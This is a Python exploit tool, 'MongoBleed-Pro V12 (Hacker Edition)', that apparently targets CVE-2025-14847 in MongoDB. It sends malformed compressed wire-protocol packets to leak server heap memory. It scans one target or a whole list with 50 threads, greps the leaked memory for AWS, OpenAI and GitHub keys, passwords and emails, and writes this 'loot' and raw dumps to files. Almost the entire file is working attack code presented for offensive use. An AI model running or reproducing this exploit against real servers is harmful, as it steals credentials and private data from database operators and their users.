#!/usr/bin/env python3
"""
███╗   ███╗ ██████╗ ███╗   ██╗ ██████╗  ██████╗ ██████╗ ██╗     ███████╗███████╗██████╗ 
████╗ ████║██╔═══██╗████╗  ██║██╔════╝ ██╔═══██╗██╔══██╗██║     ██╔════╝██╔════╝██╔══██╗
██╔████╔██║██║   ██║██╔██╗ ██║██║  ███╗██║   ██║██████╔╝██║     █████╗  █████╗  ██║  ██║
██║╚██╔╝██║██║   ██║██║╚██╗██║██║   ██║██║   ██║██╔══██╗██║     ██╔══╝  ██╔══╝  ██║  ██║
██║ ╚═╝ ██║╚██████╔╝██║ ╚████║╚██████╔╝╚██████╔╝██████╔╝███████╗███████╗███████╗██████╔╝
╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝  ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═════╝ 

MongoBleed-Pro V12 (HACKER EDITION) - CVE-2025-14847
Author: CyberTechAjju | Original PoC: Joe Desimone
Theme: Elite Hacker Style 💀🔥
"""

import socket
import struct
import zlib
import re
import argparse
import time
import sys
import os
import random
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, MofNCompleteColumn, SpinnerColumn
from rich.table import Table
from rich.panel import Panel
from rich.text import Text
from rich.align import Align

console = Console()

# ═══════════════════════════════════════════════════════════════
# 🎨 HACKER STYLE CONFIGURATION
# ═══════════════════════════════════════════════════════════════

SKULL = """
[bold red]
                            ██████                          
                        ████░░░░░░████                      
                      ██░░░░░░░░░░░░░░██                    
                    ██░░░░░░░░░░░░░░░░░░██                  
                  ██░░░░░░░░░░░░░░░░░░░░░░██                
                ██░░░░░░░░░░░░░░░░░░░░░░░░░░██              
                ██░░░░░░░░░░░░░░░░░░░░░░░░░░██              
                ██░░░░██████░░░░░░██████░░░░██              
                ██░░░░██████░░░░░░██████░░░░██              
                ██░░░░░░░░░░░░██░░░░░░░░░░░░██              
                ██░░░░░░░░░░░░░░░░░░░░░░░░░░██              
                  ██░░░░░░░░░░░░░░░░░░░░░░██                
                  ██░░░░██░░░░░░░░░░██░░░░██                
                    ██░░░░████████░░░░░░██                  
                      ██░░░░░░░░░░░░░░██                    
                        ████░░░░░░████                      
                            ██████                          
[/bold red]
"""

MATRIX_CHARS = "ｱｲｳｴｵｶｷｸｹｺｻｼｽｾｿﾀﾁﾂﾃﾄﾅﾆﾇﾈﾉﾊﾋﾌﾍﾎﾏﾐﾑﾒﾓﾔﾕﾖﾗﾘﾙﾚﾛﾜﾝ0123456789"

HACKER_QUOTES = [
    "「 The quieter you become, the more you can hear 」",
    "「 In a world of 1s and 0s, be a 2 」",
    "「 Hack the planet! 」",
    "「 There is no patch for human stupidity 」",
    "「 Knowledge is power 」",
]

# ═══════════════════════════════════════════════════════════════
# 🎭 ANIMATION EFFECTS
# ═══════════════════════════════════════════════════════════════

def matrix_effect(duration=1.5):
    """Matrix-style falling characters effect"""
    console.print("\n[bold green]", end="")
    for _ in range(int(duration * 20)):
        line = "".join(random.choice(MATRIX_CHARS) for _ in range(console.width))
        console.print(f"[green]{line[:80]}[/green]", end="\r")
        time.sleep(0.05)
    console.print("")

def typewriter(text, delay=0.03, style="bold green"):
    """Typewriter effect for text"""
    for char in text:
        console.print(f"[{style}]{char}[/{style}]", end="")
        time.sleep(delay)
    console.print("")

def glitch_text(text):
    """Glitch effect for text"""
    glitch_chars = "!@#$%^&*()_+-=[]{}|;':\",./<>?"
    result = ""
    for char in text:
        if random.random() < 0.1:
            result += random.choice(glitch_chars)
        else:
            result += char
    return result

def hacker_loading(message, duration=2):
    """Hacker-style loading animation"""
    frames = ["[■□□□□]", "[■■□□□]", "[■■■□□]", "[■■■■□]", "[■■■■■]", "[□■■■■]", "[□□■■■]", "[□□□■■]", "[□□□□■]", "[□□□□□]"]
    end_time = time.time() + duration
    i = 0
    while time.time() < end_time:
        console.print(f"\r[bold green]{frames[i % len(frames)]}[/bold green] [cyan]{message}[/cyan]", end="")
        time.sleep(0.1)
        i += 1
    console.print("\r" + " " * 60, end="\r")

# ═══════════════════════════════════════════════════════════════
# 🎯 SECRET PATTERNS
# ═══════════════════════════════════════════════════════════════

SECRET_PATTERNS = {
    "🔑 AWS Key": r"AKIA[0-9A-Z]{16}",
    "🤖 OpenAI Key": r"sk-[a-zA-Z0-9]{48}",
    "🐙 GitHub Token": r"ghp_[a-zA-Z0-9]{36}",
    "🔐 Password": r"(?i)(password|secret|token)\s*[:=]\s*([^\s,;\"']+)",
    "📧 Email": r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b"
}

# State
leaked_data = bytearray()
unique_leaks = set()
found_secrets = []

def reset_state():
    global leaked_data, unique_leaks, found_secrets
    leaked_data = bytearray()
    unique_leaks = set()
    found_secrets = []

def parse_target(target_input):
    clean = re.sub(r'^(http|https|mongodb)://', '', target_input.strip()).split('/')[0]
    if ':' in clean:
        h, p = clean.split(':')
        return h, int(p)
    return clean, 27017

# ═══════════════════════════════════════════════════════════════
# 💉 CORE EXPLOIT (EXACT POC COPY)
# ═══════════════════════════════════════════════════════════════

def send_probe(host, port, doc_len, buffer_size):
    content = b'\x10a\x00\x01\x00\x00\x00'
    bson = struct.pack('<i', doc_len) + content
    op_msg = struct.pack('<I', 0) + b'\x00' + bson
    compressed = zlib.compress(op_msg)
    payload = struct.pack('<I', 2013) + struct.pack('<i', buffer_size) + struct.pack('B', 2) + compressed
    header = struct.pack('<IIII', 16 + len(payload), 1, 0, 2012)
    
    try:
        sock = socket.socket()
        sock.settimeout(2)
        sock.connect((host, port))
        sock.sendall(header + payload)
        response = b''
        while len(response) < 4 or len(response) < struct.unpack('<I', response[:4])[0]:
            chunk = sock.recv(4096)
            if not chunk: break
            response += chunk
        sock.close()
        return response
    except: return b''

def extract_leaks(response):
    if len(response) < 25: return []
    try:
        msg_len = struct.unpack('<I', response[:4])[0]
        if struct.unpack('<I', response[12:16])[0] == 2012:
            raw = zlib.decompress(response[25:msg_len])
        else: raw = response[16:msg_len]
    except: return []
    
    leaks = []
    for match in re.finditer(rb"field name '([^']*)'", raw):
        data = match.group(1)
        if data and data not in [b'?', b'a', b'$db', b'ping']:
            leaks.append(data)
    for match in re.finditer(rb"type (\d+)", raw):
        leaks.append(bytes([int(match.group(1)) & 0xFF]))
    return leaks

# ═══════════════════════════════════════════════════════════════
# 🔍 VULNERABILITY SCANNER
# ═══════════════════════════════════════════════════════════════

def check_vulnerability(host, port):
    hacker_loading("Probing target defenses", 1)
    test_offsets = [100, 500, 1000, 1500, 2000, 3000]
    for offset in test_offsets:
        response = send_probe(host, port, offset, offset + 500)
        if extract_leaks(response):
            return True
    return False

def analyze_secrets(data):
    global found_secrets
    raw_text = data.decode('utf-8', errors='replace')
    for name, pattern in SECRET_PATTERNS.items():
        for m in re.finditer(pattern, raw_text):
            val = m.group(0)
            if (name, val) not in [(s[0], s[1]) for s in found_secrets]:
                found_secrets.append((name, val))
                console.print(f"  [bold red blink]☠️  LOOT ACQUIRED: {name}[/bold red blink]")
                console.print(f"      [bold yellow]→ {val}[/bold yellow]")

def worker(host, port, doc_len):
    global leaked_data, unique_leaks
    response = send_probe(host, port, doc_len, doc_len + 500)
    leaks = extract_leaks(response)
    
    for data in leaks:
        if data not in unique_leaks:
            unique_leaks.add(data)
            leaked_data.extend(data)
            if len(data) > 10:
                preview = data[:60].decode('utf-8', errors='replace')
                printable = "".join([c if c.isprintable() else "░" for c in preview])
                console.print(f"  [green]◉[/green] [dim cyan]0x{doc_len:04X}[/dim cyan] │ [bold white]{printable}[/bold white]")
            analyze_secrets(data)
    return len(leaks) > 0

def run_exploit(host, port, min_off, max_off, threads):
    console.print(f"\n[bold red]╔══════════════════════════════════════════════════════════════╗[/bold red]")
    console.print(f"[bold red]║[/bold red]  [bold green]💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀[/bold green]                 [bold red]║[/bold red]")
    console.print(f"[bold red]╚══════════════════════════════════════════════════════════════╝[/bold red]")
    console.print(f"\n[dim]Target Lock: {host}:{port} | Range: 0x{min_off:04X} - 0x{max_off:04X}[/dim]\n")
    
    with Progress(
        SpinnerColumn("dots12"),
        TextColumn("[bold green]⚡ Extracting..."),
        BarColumn(bar_width=30, complete_style="green", finished_style="bold green"),
        TextColumn("[bold white]{task.percentage:>3.0f}%"),
        MofNCompleteColumn(),
        console=console
    ) as progress:
        task = progress.add_task("hack", total=(max_off - min_off))
        with ThreadPoolExecutor(max_workers=threads) as executor:
            futures = {executor.submit(worker, host, port, i): i for i in range(min_off, max_off)}
            for future in as_completed(futures):
                progress.advance(task)

def show_banner():
    console.clear()
    console.print(SKULL)
    console.print(Panel.fit(
        "[bold red]M O N G O B L E E D - P R O[/bold red]\n"
        "[bold green]V12 HACKER EDITION[/bold green]\n"
        "[dim cyan]CVE-2025-14847 | Memory Leak Exploit[/dim cyan]\n\n"
        "[bold cyan]Keep Learning | Keep Hacking with CyberTechAjju[/bold cyan]",
        border_style="bold green",
        title="[bold red]☠️ ELITE ACCESS ☠️[/bold red]",
        subtitle=f"[dim]{random.choice(HACKER_QUOTES)}[/dim]"
    ))

def main():
    show_banner()
    
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', help='Target IP/URL')
    parser.add_argument('--file', help='File with target list')
    parser.add_argument('--threads', type=int, default=50)
    parser.add_argument('--min-offset', type=int, default=20)
    parser.add_argument('--max-offset', type=int, default=8192)
    args = parser.parse_args()

    targets = []
    if args.file and os.path.exists(args.file):
        with open(args.file, 'r') as f: targets = [line.strip() for line in f if line.strip()]
    elif args.target: targets = [args.target]
    else:
        console.print("\n[bold green]┌──────────────────────────────────────┐[/bold green]")
        t = console.input("[bold green]│ [/bold green][bold white]Enter Target IP/URL:[/bold white] ")
        console.print("[bold green]└──────────────────────────────────────┘[/bold green]")
        if not t: return
        targets = [t]

    for t_str in targets:
        reset_state()
        host, port = parse_target(t_str)
        
        console.print(f"\n[bold yellow]⚡ Target Acquired:[/bold yellow] [bold cyan]{host}:{port}[/bold cyan]")
        
        try:
            sock = socket.socket()
            sock.settimeout(3)
            sock.connect((host, port))
            sock.close()
            console.print("[bold green]   ✓ Port OPEN[/bold green]")
        except:
            console.print("[bold red]   ✗ Target OFFLINE[/bold red]")
            continue
        
        if not check_vulnerability(host, port):
            console.print("[bold yellow]   ⚠ NOT VULNERABLE (Patched)[/bold yellow]")
            continue
            
        console.print("[bold red]   ☠️  VULNERABLE! Initiating attack...[/bold red]")
        time.sleep(0.5)
        
        run_exploit(host, port, args.min_offset, args.max_offset, args.threads)
        
        # Results
        console.print(f"\n[bold green]╔══════════════════ EXTRACTION COMPLETE ══════════════════╗[/bold green]")
        console.print(f"[bold green]║[/bold green]  [cyan]💾 Bytes Extracted:[/cyan] [bold white]{len(leaked_data):,}[/bold white]")
        console.print(f"[bold green]║[/bold green]  [cyan]📦 Unique Fragments:[/cyan] [bold white]{len(unique_leaks):,}[/bold white]")
        console.print(f"[bold green]║[/bold green]  [cyan]🔑 Secrets Found:[/cyan] [bold white]{len(found_secrets)}[/bold white]")
        console.print(f"[bold green]╚══════════════════════════════════════════════════════════╝[/bold green]")
        
        if found_secrets:
            table = Table(title="[bold red]☠️ CAPTURED LOOT ☠️[/bold red]", border_style="red", show_header=True)
            table.add_column("Type", style="bold green")
            table.add_column("Secret", style="bold yellow")
            for n, v in found_secrets:
                table.add_row(n, v)
            console.print(table)
            
            with open(f"loot_{host}.txt", "w") as f:
                for n, v in found_secrets:
                    f.write(f"[{n}] {v}\n")
        
        with open(f"dump_{host}.bin", "wb") as f:
            f.write(leaked_data)
        console.print(f"\n[dim]Artifacts saved: loot_{host}.txt, dump_{host}.bin[/dim]")
        
        secrets_check = [b'password', b'secret', b'key', b'token', b'admin', b'AKIA']
        for s in secrets_check:
            if s.lower() in leaked_data.lower():
                console.print(f"[bold red blink]⚠️  Pattern detected in memory: {s.decode()}[/bold red blink]")

    console.print(f"\n[bold red]{'═' * 60}[/bold red]")
    console.print(f"[bold green]   ☠️  MISSION ACCOMPLISHED - CyberTechAjju  ☠️[/bold green]")
    console.print(f"[bold red]{'═' * 60}[/bold red]")
    console.print(f"\n[dim italic]{random.choice(HACKER_QUOTES)}[/dim italic]\n")

if __name__ == "__main__":
    main()
